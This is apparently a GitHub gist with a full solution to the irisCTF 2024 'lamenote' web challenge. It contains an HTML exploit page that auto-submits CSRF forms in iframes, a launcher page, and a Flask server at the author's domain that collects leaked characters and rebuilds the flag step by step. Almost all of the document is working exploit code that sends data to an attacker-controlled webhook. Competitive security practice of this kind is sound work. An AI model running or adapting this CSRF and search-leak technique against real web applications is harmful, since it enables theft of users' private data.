Created
January 9, 2024 19:01
-
-
Save nyxsorcerer/ecb7e7c89562791d01c8d4dccce57e3a to your computer and use it in GitHub Desktop.
irisCTF 2024 [lamenote]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>Document</title> | |
</head> | |
<body> | |
<iframe id="stuff" frameborder="0"></iframe> | |
<script> | |
function makeid(length) { | |
let result = ''; | |
const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; | |
const charactersLength = characters.length; | |
let counter = 0; | |
while (counter < length) { | |
result += characters.charAt(Math.floor(Math.random() * charactersLength)); | |
counter += 1; | |
} | |
return result; | |
} | |
let webhook = "https://nyxmare.world/" | |
let remote = "https://lamenote-web.chal.irisc.tf/" | |
// fetch status on mine | |
// create A-Z} iframe for csrf | |
// delete srcdoc, add src into /search?query=FLAG{A-Z} | |
// | |
const sleep = ms => new Promise(r => setTimeout(r, ms)); | |
async function check_known() { | |
let res = await fetch(webhook + "known") | |
return res.text() | |
} | |
async function main (){ | |
let charset = "abcdefghijklmnopqrstuvwxyz_}" | |
await check_known().then(async function(r){ | |
if(r.endsWith("}")){ return 1; } | |
for(let _ in charset){ | |
data_csrf = `data:text/html, | |
<html\x3e | |
<body\x3e | |
<form action="${remote}create" method="POST"> | |
<input type="hidden" name="title" value="${makeid(32)}" /> | |
<input type="hidden" name="text" value="${r+charset[_]}" /> | |
<input type="hidden" name="image" value="${webhook}iterate?c=${r + charset[_]}&' referrerpolicy='unsafe-url" /> | |
<input type="submit" value="Submit request" /> | |
</form\x3e | |
<script\x3e | |
document.forms[0].submit(); | |
</script\x3e | |
</body\x3e | |
</html\x3e` | |
console.log(r + charset[_]) | |
let iframeWrap = document.createElement('iframe') | |
iframeWrap.src = data_csrf | |
iframeWrap.id = "nyx_"+(charset[_]).replace("}", "_") | |
document.body.appendChild(iframeWrap) | |
} | |
await sleep(1*1000) | |
for(let _ in charset){ | |
let iframeWrap = document.body.querySelector("#nyx_"+(charset[_]).replace("}", "_")) | |
iframeWrap.removeAttribute('srcdoc') | |
iframeWrap.src = remote + `search?query=${r + charset[_]}` | |
} | |
await sleep(3*1000) | |
await fetch(webhook + `iterate?c=CHECK`) | |
location.reload() | |
}) | |
} | |
main() | |
</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>Document</title> | |
</head> | |
<body> | |
<!-- <iframe id="stuff" src="https://lamenote-web.chal.irisc.tf/search?query=" frameborder="0"></iframe> --> | |
<script> | |
const sleep = ms => new Promise(r => setTimeout(r, ms)); | |
async function main (){ | |
window.open('/csrf') | |
} | |
main() | |
</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import * | |
from urllib.parse import urlparse | |
from functools import wraps | |
import string | |
chars = [] | |
known = "irisctf{please_no_more_unintended_bug" | |
app = Flask(__name__) | |
@app.after_request | |
def csp(response): | |
response.headers["Access-Control-Allow-Origin"] = "*" | |
return response | |
@app.route("/") | |
def index(): | |
return "idklol" | |
@app.route("/start_exp") | |
def exp(): | |
return send_file("index.html") | |
@app.route("/csrf") | |
def csrf(): | |
return send_file("csrf.html") | |
@app.route("/known") | |
def known_(): | |
global known | |
print(known) | |
return known | |
def check_not_exists(): | |
global chars, known | |
charset = list(string.ascii_lowercase + "_}") | |
for x in chars: | |
if x in charset: | |
charset.remove(x) | |
print(charset) | |
known += charset[0] | |
print(known) | |
chars = [] | |
pass | |
@app.route("/iterate", methods=["GET", "OPTIONS"]) | |
def home(): | |
global chars | |
char = request.args.get("c", "(empty)").replace(known, "") | |
ref = request.headers.get("Referer", "") | |
print(ref) | |
if "/note/" in ref: | |
return "" | |
if(char == 'CHECK'): | |
check_not_exists() | |
elif(char == '(empty)'): | |
print("SOMETHING WENT WRONG") | |
else: | |
print(chars) | |
chars.append(char) | |
return "" | |
app.run("0.0.0.0", 80) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment